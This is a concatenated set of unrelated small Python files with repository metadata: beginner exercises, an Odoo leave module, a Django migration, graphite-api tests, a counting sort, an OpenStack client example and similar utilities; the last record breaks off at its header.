| 2021-05-31T09:52:09.884572 | 2016-01-30T16:23:02 | 2016-01-30T16:23:02 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 577 |
py
|
# -*- coding: utf-8 -*-
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
import sys
from pprint import pprint
sys.path.insert(0, '.')
from examples.base import run
# Fixtures
dataset = 'datapackage'
# Embed the running interpreter version in the prefix so test runs under
# different Python versions do not collide in the shared dataset.
prefix = 'finance_vix_%s_%s_' % (sys.version_info.major, sys.version_info.minor)
source = 'examples/packages/finance-vix/datapackage.json'
target = 'tmp/packages/finance-vix/datapackage.json'
# Execution
if __name__ == '__main__':
    run(dataset, prefix, source, target)
|
[
"[email protected]"
] | |
8a7d55caa81a5c81fa616f5f2ed3c6f0142efd0a
|
69bc23a7baf65b276496d76d02645b5a76cfe083
|
/thu_python_16/program3.py
|
f3332c8639d67bd315206d183acabe04cb6c234d
|
[] |
no_license
|
pylinx64/thu_python_16
|
a12e4ec8f82e6470b496116342b777e0a6676be1
|
617e75618a5a3117ec34278c41dadb38aa39fdb8
|
refs/heads/main
| 2023-04-23T03:17:31.347867 | 2021-05-05T10:09:57 | 2021-05-05T10:09:57 | 336,022,469 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 568 |
py
|
#x=10
#print(x)
#y=10
#print(x+y)
#print('x+y')
#x=20
#z = 10
#print(x+y+z)
#x='Яготинское'
#k='молоко'
#print(x+' '+k)
#print('Яготинское'+' молоко')
#print(k * 143543543)
#print(11 > 10)
#print(8 > 9)
#print(9 != 9)
#print(9 == 9)
#x = 8
#y = 9
#print(x >= y)
#print('a' == 'a')
#print('с' == 'c')
#print('z' > 'a')
# Simple password gate: compare the typed value against a hard-coded password.
password = input('Введите пароль: ')
if 'abc123' == password:
    print('Вход выполнен')
else:
    print('Невход выполнен 404')
|
[
"[email protected]"
] | |
d073cf0e510babb4c2329508f3b0d549e0cf3cec
|
0bc2a2963cb72c09c0ec0b3e3b10911c7bc31342
|
/examples/manila/script.py
|
a5f6b5d55011b15a3bcca5fbe09c09f48968cb7b
|
[] |
no_license
|
cloudify-cosmo/cloudify-openstack-plugin
|
eb5730d0b75442e6a49069164fde03020dcca1de
|
7d2cd4162897333adcaab4bd83361bbd369fcf17
|
refs/heads/master
| 2023-09-06T09:10:53.372638 | 2023-03-06T15:02:59 | 2023-03-06T15:02:59 | 18,327,738 | 19 | 75 | null | 2023-03-06T15:03:01 | 2014-04-01T11:52:24 |
Python
|
UTF-8
|
Python
| false | false | 391 |
py
|
# For development help:
from manilaclient import client
# Fill in with real values.
# Builds a Manila v2 client against a devstack-style identity endpoint.
manila = client.Client(
    client_version='2',
    username='admin',
    password='openstack',
    project_name='demo',
    auth_url='http://10.11.12.2/identity',
    user_domain_name='Default',
    project_domain_name='default')
# Smoke-test the connection by listing share networks and shares.
share_networks = manila.share_networks.list()
shares = manila.shares.list()
|
[
"[email protected]"
] | |
dd30c5254405af64ce994ba786c148924ddf521c
|
fd0194543a142c63812352e79c417e54a19d0cd5
|
/Auxiliary_Scripts/Plot_Relocate.py
|
7633b63d02c80b1e30093bd97aeca0eb93c5d1b2
|
[] |
no_license
|
mwilensky768/MJW-MWA
|
2ac85b8f07577e3112c418595bf62902d720c3c2
|
ebda1e273a401c88f014bc698743547ec86a6f35
|
refs/heads/master
| 2021-05-02T00:51:48.591198 | 2021-03-31T22:34:06 | 2021-03-31T22:34:06 | 78,403,875 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 324 |
py
|
import glob
import shutil
import os
# Copy every "*__INS_frac_diff.png" plot from plot_dir into target_dir.
plot_dir = '/Users/mike_e_dubs/MWA/Catalogs/Wenyang_Phase2/data_eva/unflagged/'
target_dir = '/Users/mike_e_dubs/MWA/Catalogs/Wenyang_Phase2/data_eva/frac_diff/'
plots = glob.glob('%s*__INS_frac_diff.png' % (plot_dir))
print(plots)
for plot in plots:
    shutil.copy(plot, target_dir)
|
[
"[email protected]"
] | |
344513f40b84e70156a271a556a0a7afa60bb84b
|
6febc1719503d0f9dbc97f6b1202116370391b10
|
/public_holiday/models/hr_holidays_inherited_model.py
|
fa5c2a57f2e8a69880f076eb808b1dbb72e214ac
|
[] |
no_license
|
arshakil/Odoo-Development
|
5c6a1795cd64a8ebef5abfdf7d6245804594bcd8
|
df37f6e8c2f7d89cdbdb36d0a8fd501ef8bfe563
|
refs/heads/master
| 2022-12-11T05:17:12.123339 | 2020-07-28T07:38:58 | 2020-07-28T07:38:58 | 248,154,189 | 0 | 2 | null | 2022-12-08T03:51:50 | 2020-03-18T06:20:59 |
Python
|
UTF-8
|
Python
| false | false | 3,029 |
py
|
from odoo import models, fields, api, _
from odoo.exceptions import ValidationError
from datetime import date, datetime
from datetime import datetime, timedelta
class Hr_Holidays_inherited_Model(models.Model):
    """Extend hr.holidays: for leave types flagged ``exclude_public_holidays``,
    subtract public holidays falling inside the requested period from the
    number of leave days."""
    _inherit = 'hr.holidays'

    # Count of public holidays inside [date_from, date_to]; recomputed by
    # check_public_holiday and also written explicitly in create().
    public_holiday=fields.Float(string='Public Holiday In Between',compute='check_public_holiday')

    @api.model
    def create(self, vals):
        holiday_status_id=vals['holiday_status_id']
        # print ("vals date_from",vals['date_from'])
        # print ('state', vals['state'])
        # print ('holiday_status_id is called',holiday_status_id)
        # Only leave *requests* (type 'remove') are adjusted, and only when
        # the leave type is configured to exclude public holidays.
        if vals['type'] == 'remove':
            Is_check_hr_holidays_status= self.env['hr.holidays.status'].search([('id','=',holiday_status_id),('exclude_public_holidays','=',True)])
            if Is_check_hr_holidays_status:
                if vals['date_from'] and vals['date_to']:
                    count = 0;
                    start_date = datetime.strptime(vals['date_from'], '%Y-%m-%d %H:%M:%S').date()
                    end_date = datetime.strptime(vals['date_to'], '%Y-%m-%d %H:%M:%S').date()
                    # Every calendar day covered by the leave, inclusive.
                    range_of_dates = [start_date + timedelta(days=x) for x in range((end_date - start_date).days + 1)]
                    for public_holiday_date in range_of_dates:
                        # NOTE(review): re-fetches ALL public_holiday records
                        # per day, and compares pub_holiday.start as a plain
                        # 'YYYY-MM-DD' string — confirm the stored format.
                        check_public_holidays = self.env['public_holiday.public_holiday'].search([])
                        for pub_holiday in check_public_holidays:
                            if str(public_holiday_date)==pub_holiday.start:
                                count+=1
                            else:
                                pass
                    set_count=vals['number_of_days_temp']-float(count)
                    if vals['number_of_days_temp']<1:
                        vals['number_of_days_temp']=0
                        vals['public_holiday']=0
                    else:
                        vals['number_of_days_temp']=set_count
                        vals['public_holiday'] = float(count)
                return super(Hr_Holidays_inherited_Model, self).create(vals)
        else:
            return super(Hr_Holidays_inherited_Model, self).create(vals)

    @api.depends('date_from', 'date_to')
    def check_public_holiday(self):
        # Compute-field mirror of the counting loop in create(); leaves
        # public_holiday unset when either boundary date is missing.
        # NOTE(review): a 'remove' request whose leave type does NOT exclude
        # public holidays appears to fall through create() without a return —
        # verify against the original file.
        if self.date_from and self.date_to:
            count = 0;
            start_date = datetime.strptime(self.date_from, '%Y-%m-%d %H:%M:%S').date()
            end_date = datetime.strptime(self.date_to, '%Y-%m-%d %H:%M:%S').date()
            range_of_dates = [start_date + timedelta(days=x) for x in range((end_date - start_date).days + 1)]
            for public_holiday_date in range_of_dates:
                check_public_holidays = self.env['public_holiday.public_holiday'].search([])
                for pub_holiday in check_public_holidays:
                    if str(public_holiday_date) == pub_holiday.start:
                        count += 1
                    else:
                        pass
            self.public_holiday=count
|
[
"[email protected]"
] | |
e938435982e4bca35a3bbaf1e7c4c35be18545a9
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/182/usersdata/265/105453/submittedfiles/diagonaldominante.py
|
2a3603de9bfd26bb77e24473ed3f5a3d2574df4e
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 500 |
py
|
# -*- coding: utf-8 -*-
import numpy as np
def soma(A):
    """Return a list with the sum of each row of the 2-D array ``A``.

    :param A: numpy 2-D array (shape (m, n)).
    :return: list of m row sums.
    """
    somalinhas = []
    for i in range(0, A.shape[0], 1):
        cont = 0
        # BUG FIX: the original wrote "range(0,A,shape[1],1)" (comma instead
        # of dot — a TypeError) and summed the global ``a`` instead of the
        # parameter ``A``.
        for j in range(0, A.shape[1], 1):
            cont = cont + A[i, j]
        somalinhas.append(cont)
    return somalinhas
# Read a square matrix from the user, echo it and print its row sums.
linhas = int(input('digite a quantidade de linhas: '))
a = np.zeros((linhas, linhas))
for i in range(0, a.shape[0], 1):
    for j in range(0, a.shape[1], 1):
        a[i, j] = float(input('digite os valores da matriz: '))
print(a)
# BUG FIX: the original called an undefined function ``diagonal(linhas)``;
# the row sums are produced by ``soma`` defined above.
print(soma(a))
|
[
"[email protected]"
] | |
7e1ccc3c0c0d628fe5629e0ba6ef33d3b0101291
|
bf0ecad5f2d9853944e6bbc1ab6160359e9a6803
|
/blog/migrations/0001_initial.py
|
d30bdf5599f3883def76510678e4cb1d43d9f3c0
|
[] |
no_license
|
NiteshPidiparars/icoder-blog-post
|
9addc53a83ec916c421ee16de7b04b8035be5d6b
|
19c5a333faf520b4133a0fa5d5ccf37320ed4181
|
refs/heads/master
| 2023-05-28T01:41:11.114065 | 2021-06-16T07:05:48 | 2021-06-16T07:05:48 | 374,288,121 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 683 |
py
|
# Generated by Django 3.2.4 on 2021-06-04 06:36
from django.db import migrations, models
class Migration(migrations.Migration):
    # Initial schema (Django 3.2): creates the Post table with sno as an
    # explicit auto-increment primary key.

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Post',
            fields=[
                ('sno', models.AutoField(primary_key=True, serialize=False)),
                ('title', models.CharField(max_length=255)),
                ('author', models.CharField(max_length=14)),
                ('slug', models.CharField(max_length=130)),
                ('timeStamp', models.DateTimeField(blank=True)),
                ('content', models.TextField()),
            ],
        ),
    ]
|
[
"[email protected]"
] | |
dde36e2eae98fd6ebba3dc430abdd47affdd0f65
|
a3e7583b70584f62554c5969a9963ba79afd7ac3
|
/check.py
|
b7630edc09bab8c7a639472f47604386f4a53a32
|
[
"MIT"
] |
permissive
|
foamliu/DeepRankIQA
|
4f677a2fe1912b16cf4bbcc05c8571d46260711f
|
7801cb4ff2c934a9d954ace9ad52600f96396125
|
refs/heads/master
| 2020-09-03T06:02:05.896210 | 2019-11-05T01:30:27 | 2019-11-05T01:30:27 | 219,402,631 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 717 |
py
|
import os
import pickle
import cv2 as cv
from tqdm import tqdm
from config import data_file, image_folder
if __name__ == "__main__":
    # Sanity-check the dataset: every 'before' and 'after' image referenced
    # by the pickled samples must exist and be readable by OpenCV.
    with open(data_file, 'rb') as f:
        samples = pickle.load(f)
    filenames = set()
    for sample in tqdm(samples):
        before = sample['before']
        fullpath = os.path.join(image_folder, before)
        img = cv.imread(fullpath)
        assert (img is not None)
        filenames.add(before)
        after = sample['after']
        # BUG FIX: the original rebuilt this path from ``before``, so the
        # 'after' images were never actually checked on disk.
        fullpath = os.path.join(image_folder, after)
        img = cv.imread(fullpath)
        assert (img is not None)
        filenames.add(after)
    # Unique image count across both roles.
    num_samples = len(list(filenames))
    print('num_samples: ' + str(num_samples))
|
[
"[email protected]"
] | |
478dec05c29f554e8d1effc63ad7264f99e95538
|
c236e0c3b34a81e75acb9591423b6aad9d6a22dd
|
/unitTestRunner.py
|
451a956edaed0cee0386f60f3b60470f1b9a6a7c
|
[] |
no_license
|
abhijeetdtu/heimcharge
|
2cd68c9eaaf5b94206d310c8b8348133b5d4e77b
|
569a9d22916808ba8b67169a2822a91e05a051e9
|
refs/heads/master
| 2021-06-06T02:55:29.913134 | 2019-06-11T03:07:20 | 2019-06-11T03:07:20 | 131,433,168 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 182 |
py
|
import unittest
from UnitTests.ChartPlotTest import *
from UnitTests.GeoOpsTest import *
from UnitTests.FileOpsTest import *
if __name__ == '__main__':
    # exit=False keeps the interpreter alive after the run instead of
    # calling sys.exit() with the test result code.
    unittest.main(exit=False)
|
[
"[email protected]"
] | |
b23143408eae95819c6760c853c06db075ea9987
|
d62e01ee1b50b8228d25736daceae0e822f3a0a0
|
/examples/user_guide/add_tasks.py
|
e323c771d0a918d6b08a4f1fc852134d93c6e40d
|
[
"MIT"
] |
permissive
|
dalg24/radical.entk
|
b6f34ae1b2075f638fbdfd5fc397ea4c0d87cb93
|
4aa68d8de7804e09ca64629035ccda0b79ac0b76
|
refs/heads/master
| 2020-04-03T17:25:37.548618 | 2018-10-16T12:06:30 | 2018-10-16T12:06:30 | 155,444,172 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,916 |
py
|
from radical.entk import Pipeline, Stage, Task, AppManager
import os
# ------------------------------------------------------------------------------
# Set default verbosity
if os.environ.get('RADICAL_ENTK_VERBOSE') == None:
os.environ['RADICAL_ENTK_REPORT'] = 'True'
# Description of how the RabbitMQ process is accessible
# No need to change/set any variables if you installed RabbitMQ has a system
# process. If you are running RabbitMQ under a docker container or another
# VM, set "RMQ_HOSTNAME" and "RMQ_PORT" in the session where you are running
# this script.
hostname = os.environ.get('RMQ_HOSTNAME', 'localhost')
port = os.environ.get('RMQ_PORT', 5672)
if __name__ == '__main__':
    # Build a one-stage pipeline of ten echo tasks and run it locally.
    # Create a Pipeline object
    p = Pipeline()
    # Create a Stage object
    s = Stage()
    for cnt in range(10):
        # Create a Task object
        t = Task()
        t.name = 'my-task' # Assign a name to the task (optional, do not use ',' or '_')
        t.executable = ['/bin/echo'] # Assign executable to the task
        t.arguments = ['I am task %s'%cnt] # Assign arguments for the task executable
        # Add the Task to the Stage
        s.add_tasks(t)
    # Add Stage to the Pipeline
    p.add_stages(s)
    # Create Application Manager
    appman = AppManager(hostname=hostname, port=port)
    # Create a dictionary describe four mandatory keys:
    # resource, walltime, and cpus
    # resource is 'local.localhost' to execute locally
    res_dict = {
        'resource': 'local.localhost',
        'walltime': 10,
        'cpus': 1
    }
    # Assign resource request description to the Application Manager
    appman.resource_desc = res_dict
    # Assign the workflow as a set or list of Pipelines to the Application Manager
    # Note: The list order is not guaranteed to be preserved
    appman.workflow = set([p])
    # Run the Application Manager
    appman.run()
|
[
"[email protected]"
] | |
190402e6dd636bf2f4fa9578042f043ce51c8530
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/wtBko8Bc8o8Tmra3q_11.py
|
93df75889df3f71ae56c4f1e24530b81e184ba11
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 135 |
py
|
def halflife_calculator(mass, hlife, n):
mass_left = mass/(2**n)
years = hlife * n
return [round(mass_left,3),years]
|
[
"[email protected]"
] | |
008880df49eaa648acea8a9abf9ffaa149112098
|
85c0813d837b0e0f189020a52348db1deffb0b11
|
/public/db/coupon_db.py
|
80daaa213acc609f25eb27d5f2237e1696469652
|
[] |
no_license
|
reb00t2018/flask-reptiles
|
2d49fb27e718e305a7127e05047d865a1e7a6157
|
ac3832340219f922e3b9451c2e2b1e18773938c1
|
refs/heads/master
| 2020-07-03T03:05:56.991764 | 2019-06-11T01:19:14 | 2019-06-11T01:19:14 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,051 |
py
|
# -*- coding: utf-8 -*-
__author__ = 'Apple'
from public.db.participle_db import DataBase_PD
class CouponDB(DataBase_PD):
    """Data-access helpers for the goods table and the proxy-IP pool."""

    def __init__(self):
        super(CouponDB, self).__init__()

    def save_coupon(self, coupon):
        """Insert one goods record unless one with the same title exists.

        :param coupon: object exposing the goods fields as attributes.
        :return: execute() result on insert, False when the title exists.
        """
        # BUG FIX: the original wrapped the whole INSERT statement in an
        # extra pair of parentheses, which is invalid SQL.
        insert_sql = """
            insert into goods_goods(category_id,second_id,first_id,title, price, url, pic, brand,goods_desc,add_time)
            values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)
        """
        old_coupon = self.is_has_by_name(coupon.title)
        insert_data = (
            coupon.category_id, coupon.second_id, coupon.first_id, coupon.title, coupon.price, coupon.url,
            coupon.pic, coupon.brand, coupon.goods_desc, coupon.add_time
        )
        if not old_coupon:
            return self.execute(insert_sql, insert_data)
        return False

    def is_has_by_name(self, title):
        """Return a truthy row when a goods record with ``title`` exists."""
        sql = """
            select 1 from goods_goods where title = %s
        """
        # Pass parameters as a tuple — (title) is just title, and DB-API
        # drivers expect a sequence of parameters.
        return self.find_execute(sql, (title,))

    def save_ip(self, ip, time):
        """Store one proxy IP with its acquisition timestamp."""
        insert_sql = """
            insert into goods_getip(ip,add_time) values (%s,%s)
        """
        return self.execute(insert_sql, (ip, time))

    def count_ip(self):
        """Return the number of stored proxy IPs."""
        select_sql = """
            select count(*) from goods_getip
        """
        return self.find_execute(select_sql)

    def delete_ip(self, getip):
        """Delete the proxy-IP row with primary key ``getip``."""
        # Parameterized instead of str.format: avoids SQL injection and
        # quoting bugs.
        delete_sql = """
            DELETE FROM goods_getip WHERE id = %s
        """
        return self.execute(delete_sql, (getip,))

    def sumip(self):
        """Return all stored proxy-IP rows."""
        select_sql = """
            select * from goods_getip
        """
        return self.find_execute(select_sql, fetchone=False)
|
[
"[email protected]"
] | |
44c569b36803775a0c36187b8503777aef16b0ec
|
fa7790c45dbc1ee804011e9dff2d4ff424b9f3d6
|
/Searching and Sorting/Counting sort/Implementation.py
|
63a5b8f34c85215b5c59e2ea21c34fde374752dc
|
[] |
no_license
|
KuroKousuii/Algorithms
|
bcdf75e58e20287e3162ef3302f8051604d7b7d6
|
3bf0250780c9d11c69546ca0da130fbbcada7e40
|
refs/heads/main
| 2023-05-31T07:41:07.399881 | 2021-06-16T09:32:16 | 2021-06-16T09:32:16 | 368,274,761 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,177 |
py
|
# Python program for counting sort
# The main function that sort the given string arr[] in
# alphabetical order
def countSort(arr):
    """Counting sort of the characters of ``arr``.

    Assumes every character has an ordinal in 0..255. Returns the sorted
    characters as a list (the input string is immutable, hence a new list).
    """
    # Output slots, one per input character.
    output = [0 for i in range(len(arr))]
    # Histogram of character codes.
    count = [0 for i in range(256)]
    # Result list (strings are immutable, so build a list of characters).
    ans = ["" for _ in arr]
    for i in arr:
        count[ord(i)] += 1
    # Prefix sums: count[c] becomes the (exclusive) end position of code c.
    # BUG FIX: start at 1 — the original started at 0 and added count[-1]
    # (i.e. count[255]) into count[0], corrupting the result whenever
    # chr(255) occurs in the input.
    for i in range(1, 256):
        count[i] += count[i - 1]
    # Place each character at its slot, decrementing the boundary as we go.
    for i in range(len(arr)):
        output[count[ord(arr[i])] - 1] = arr[i]
        count[ord(arr[i])] -= 1
    # Copy into the answer list.
    for i in range(len(arr)):
        ans[i] = output[i]
    return ans
# Driver program to test above function
arr = "geeksforgeeks"
ans = countSort(arr)
print("Sorted character array is % s" % ("".join(ans)))
|
[
"[email protected]"
] | |
11c74340ab82e472305fd10a2cd5370c1dea9ffb
|
fb1a7534356941e763755838e9b06fede7a7d116
|
/tests/test_metrics.py
|
46fe3e1aeab2e0aed220e08069a18e20c0547717
|
[
"Apache-2.0"
] |
permissive
|
torkelo/graphite-api
|
e2417f0bddae9bcd0581272dc270bbe08a78d653
|
0fd1904b462c1cbbe99f531a365839647a01a7e1
|
refs/heads/master
| 2020-12-02T15:08:56.573796 | 2014-03-17T21:59:38 | 2014-03-17T21:59:38 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,363 |
py
|
import os.path
import whisper
from . import TestCase, WHISPER_DIR
class MetricsTests(TestCase):
    """HTTP-level tests for the /metrics/* endpoints, backed by a scratch
    whisper storage directory (WHISPER_DIR from the test base module)."""

    def _create_dbs(self):
        # Seed two whisper databases: a leaf metric test.foo and a branch
        # test.bar containing the leaf test.bar.baz.
        for db in (
            ('test', 'foo.wsp'),
            ('test', 'bar', 'baz.wsp'),
        ):
            db_path = os.path.join(WHISPER_DIR, *db)
            os.makedirs(os.path.dirname(db_path))
            whisper.create(db_path, [(1, 60)])

    def test_find(self):
        # /metrics/find: query parameter is mandatory; exercises treejson
        # and completer formats, with and without wildcard entries.
        url = '/metrics/find'
        response = self.app.get(url)
        self.assertEqual(response.status_code, 400)
        response = self.app.get(url, query_string={'query': 'test'})
        self.assertJSON(response, [])
        response = self.app.get(url, query_string={'query': 'test',
                                                   'format': 'completer'})
        self.assertJSON(response, {'metrics': []})
        self._create_dbs()
        response = self.app.get(url, query_string={'query': 'test.*',
                                                   'format': 'treejson'})
        self.assertJSON(response, [{
            'allowChildren': 1,
            'expandable': 1,
            'id': 'test.bar',
            'leaf': 0,
            'text': 'bar',
        }, {
            'allowChildren': 0,
            'expandable': 0,
            'id': 'test.foo',
            'leaf': 1,
            'text': 'foo',
        }])
        response = self.app.get(url, query_string={'query': 'test.*',
                                                   'format': 'treejson',
                                                   'wildcards': 1})
        self.assertJSON(response, [{
            'text': '*',
            'expandable': 1,
            'leaf': 0,
            'id': 'test.*',
            'allowChildren': 1,
        }, {
            'allowChildren': 1,
            'expandable': 1,
            'id': 'test.bar',
            'leaf': 0,
            'text': 'bar',
        }, {
            'allowChildren': 0,
            'expandable': 0,
            'id': 'test.foo',
            'leaf': 1,
            'text': 'foo',
        }])
        response = self.app.get(url, query_string={'query': 'test.*',
                                                   'format': 'completer'})
        self.assertJSON(response, {'metrics': [{
            'is_leaf': 0,
            'name': 'bar',
            'path': 'test.bar.',
        }, {
            'is_leaf': 1,
            'name': 'foo',
            'path': 'test.foo',
        }]})
        response = self.app.get(url, query_string={'query': 'test.*',
                                                   'wildcards': 1,
                                                   'format': 'completer'})
        self.assertJSON(response, {'metrics': [{
            'is_leaf': 0,
            'name': 'bar',
            'path': 'test.bar.',
        }, {
            'is_leaf': 1,
            'name': 'foo',
            'path': 'test.foo',
        }, {
            'name': '*',
        }]})

    def test_find_validation(self):
        # /metrics/find rejects malformed wildcards/from/until/format values.
        url = '/metrics/find'
        response = self.app.get(url, query_string={'query': 'foo',
                                                   'wildcards': 'aaa'})
        self.assertJSON(response, {'errors': {'wildcards': 'must be 0 or 1.'}},
                        status_code=400)
        response = self.app.get(url, query_string={'query': 'foo',
                                                   'from': 'aaa',
                                                   'until': 'bbb'})
        self.assertJSON(response, {'errors': {
            'from': 'must be an epoch timestamp.',
            'until': 'must be an epoch timestamp.',
        }}, status_code=400)
        response = self.app.get(url, query_string={'query': 'foo',
                                                   'format': 'other'})
        self.assertJSON(response, {'errors': {
            'format': 'unrecognized format: "other".',
        }}, status_code=400)

    def test_expand(self):
        # /metrics/expand resolves globs, optionally leaves-only or grouped
        # by the original expression.
        url = '/metrics/expand'
        response = self.app.get(url)
        self.assertJSON(response, {'errors':
                                   {'query': 'this parameter is required.'}},
                        status_code=400)
        response = self.app.get(url, query_string={'query': 'test'})
        self.assertJSON(response, {'results': []})
        self._create_dbs()
        response = self.app.get(url, query_string={'query': 'test'})
        self.assertJSON(response, {'results': ['test']})
        response = self.app.get(url, query_string={'query': 'test.*'})
        self.assertJSON(response, {'results': ['test.bar', 'test.foo']})
        response = self.app.get(url, query_string={'query': 'test.*',
                                                   'leavesOnly': 1})
        self.assertJSON(response, {'results': ['test.foo']})
        response = self.app.get(url, query_string={'query': 'test.*',
                                                   'groupByExpr': 1})
        self.assertJSON(response, {'results': {'test.*': ['test.bar',
                                                          'test.foo']}})

    def test_expand_validation(self):
        # /metrics/expand rejects non-boolean leavesOnly/groupByExpr flags.
        url = '/metrics/expand'
        response = self.app.get(url, query_string={'query': 'foo',
                                                   'leavesOnly': 'bbb',
                                                   'groupByExpr': 'aaa'})
        self.assertJSON(response, {'errors': {
            'groupByExpr': 'must be 0 or 1.',
            'leavesOnly': 'must be 0 or 1.',
        }}, status_code=400)

    def test_noop(self):
        # Placeholder endpoints kept for graphite-web compatibility.
        url = '/dashboard/find'
        response = self.app.get(url)
        self.assertJSON(response, {'dashboards': []})
        url = '/dashboard/load/foo'
        response = self.app.get(url)
        self.assertJSON(response, {'error': "Dashboard 'foo' does not exist."},
                        status_code=404)
        url = '/events/get_data'
        response = self.app.get(url)
        self.assertJSON(response, [])

    def test_search(self):
        # /metrics/search: parameter validation and the empty-index case.
        url = '/metrics/search'
        response = self.app.get(url, query_string={'max_results': 'a'})
        self.assertJSON(response, {'errors': {
            'max_results': 'must be an integer.',
            'query': 'this parameter is required.'}}, status_code=400)
        response = self.app.get(url, query_string={'query': 'test'})
        self.assertJSON(response, {'metrics': []})

    def test_search_index(self):
        # Rebuilding the index via PUT /index makes new whisper files
        # discoverable by /metrics/search.
        response = self.app.get('/metrics/search',
                                query_string={'query': 'collectd.*'})
        self.assertJSON(response, {'metrics': []})
        parent = os.path.join(WHISPER_DIR, 'collectd')
        os.makedirs(parent)
        for metric in ['load', 'memory', 'cpu']:
            db = os.path.join(parent, '{0}.wsp'.format(metric))
            whisper.create(db, [(1, 60)])
        response = self.app.put('/index')
        self.assertJSON(response, {'success': True, 'entries': 3})
        response = self.app.get('/metrics/search',
                                query_string={'query': 'collectd.*'})
        self.assertJSON(response, {'metrics': [
            {'is_leaf': False, 'path': None},
            {'is_leaf': True, 'path': 'collectd.cpu'},
            {'is_leaf': True, 'path': 'collectd.load'},
            {'is_leaf': True, 'path': 'collectd.memory'},
        ]})
|
[
"[email protected]"
] | |
8afec5a7c9748873c1dbc65e7e67f6d025f33a9e
|
51d098e7ac392556a6365fcf7d283546d1bc86cb
|
/pysswords/db/credential.py
|
651901a52f61b2811503c8e9363f048ac638b221
|
[
"MIT"
] |
permissive
|
mauriciomelo/pysswords
|
7dd632577b261aa198a618ca1d6d0faa825cb5e7
|
e845475a2a37f6e5ac4fadbc821d89dad6971f1c
|
refs/heads/master
| 2021-01-13T11:41:44.568197 | 2014-12-04T19:32:57 | 2014-12-04T19:32:57 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 144 |
py
|
from collections import namedtuple
# Immutable record describing one stored credential entry.
Credential = namedtuple(
    "Credential",
    "name login password login_url description",
)
|
[
"[email protected]"
] | |
53e93f962e07335199743cfd2031f7866c6928b6
|
f891828ffe9c8501d276560c8c52d319f284056f
|
/205_isomorphic_m/index_map.py
|
0f5f7ccd9a02480277885e72dd81ce413e922721
|
[] |
no_license
|
chao-shi/lclc
|
1b852ab61fef4072039c61f68e951ab2072708bf
|
2722c0deafcd094ce64140a9a837b4027d29ed6f
|
refs/heads/master
| 2021-06-14T22:07:54.120375 | 2019-09-02T23:13:59 | 2019-09-02T23:13:59 | 110,387,039 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 214 |
py
|
class Solution(object):
    def isIsomorphic(self, s, t):
        """
        :type s: str
        :type t: str
        :rtype: bool

        Two strings are isomorphic when their first-occurrence index
        patterns match (str.find maps each char to its first position).
        """
        # BUG FIX (Python 3): ``map`` returns a lazy iterator and two map
        # objects never compare equal, so the original always returned
        # False under Python 3. Materialize the patterns before comparing.
        return [s.find(c) for c in s] == [t.find(c) for c in t]
# From OJ discussion
|
[
"[email protected]"
] | |
a44f223635db7b358b49ccb6ca7923250c316bad
|
be5ea20226c37d81f1ccb2f704d8825d36e88765
|
/Exams/2-apr-2020/skeleton/tests/test_magic_card.py
|
75d8d74d391b2baf58d8a14b44e8e5b922aabf4f
|
[] |
no_license
|
dimDamyanov/PythonOOP
|
3845e450e5a48fef4f70a186664e07c0cd60e09b
|
723204f5b7e953874fac9314e48eb1d1628d6ff5
|
refs/heads/main
| 2023-04-07T18:00:36.735248 | 2021-04-19T20:57:14 | 2021-04-19T20:57:14 | 341,329,346 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,231 |
py
|
import unittest
from project.card.magic_card import MagicCard
class TestMagicCard(unittest.TestCase):
    """Tests for MagicCard: constructor defaults and the ValueError raised
    by the name/damage/health validation."""

    def setUp(self) -> None:
        self.magic_card = MagicCard('Card')

    def test_init_attrs_set(self) -> None:
        # Constructor defaults: 5 damage points and 80 HP.
        self.assertEqual(self.magic_card.name, 'Card')
        self.assertEqual(self.magic_card.damage_points, 5)
        self.assertEqual(self.magic_card.health_points, 80)

    def test_init__when_name_invalid__expect_exception(self) -> None:
        with self.assertRaises(ValueError) as context:
            MagicCard('')
        self.assertEqual(context.exception.args[0], 'Card\'s name cannot be an empty string.')

    def test_damage_points_setter__expect_exception(self) -> None:
        with self.assertRaises(ValueError) as context:
            self.magic_card.damage_points = -10
        self.assertEqual(context.exception.args[0], 'Card\'s damage points cannot be less than zero.')

    def test_health_points_setter__expect_exception(self) -> None:
        with self.assertRaises(ValueError) as context:
            self.magic_card.health_points = -10
        self.assertEqual(context.exception.args[0], 'Card\'s HP cannot be less than zero.')
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
426d534ea1ee13cc690136f8ee33d913fa161456
|
fd90b8efa1daaec44b54797e549e0f738f4a5897
|
/shuxue/3的幂.py
|
648fe8a17fac9249b54026f7347281ef036e3e5e
|
[] |
no_license
|
ddz-mark/LeetCode
|
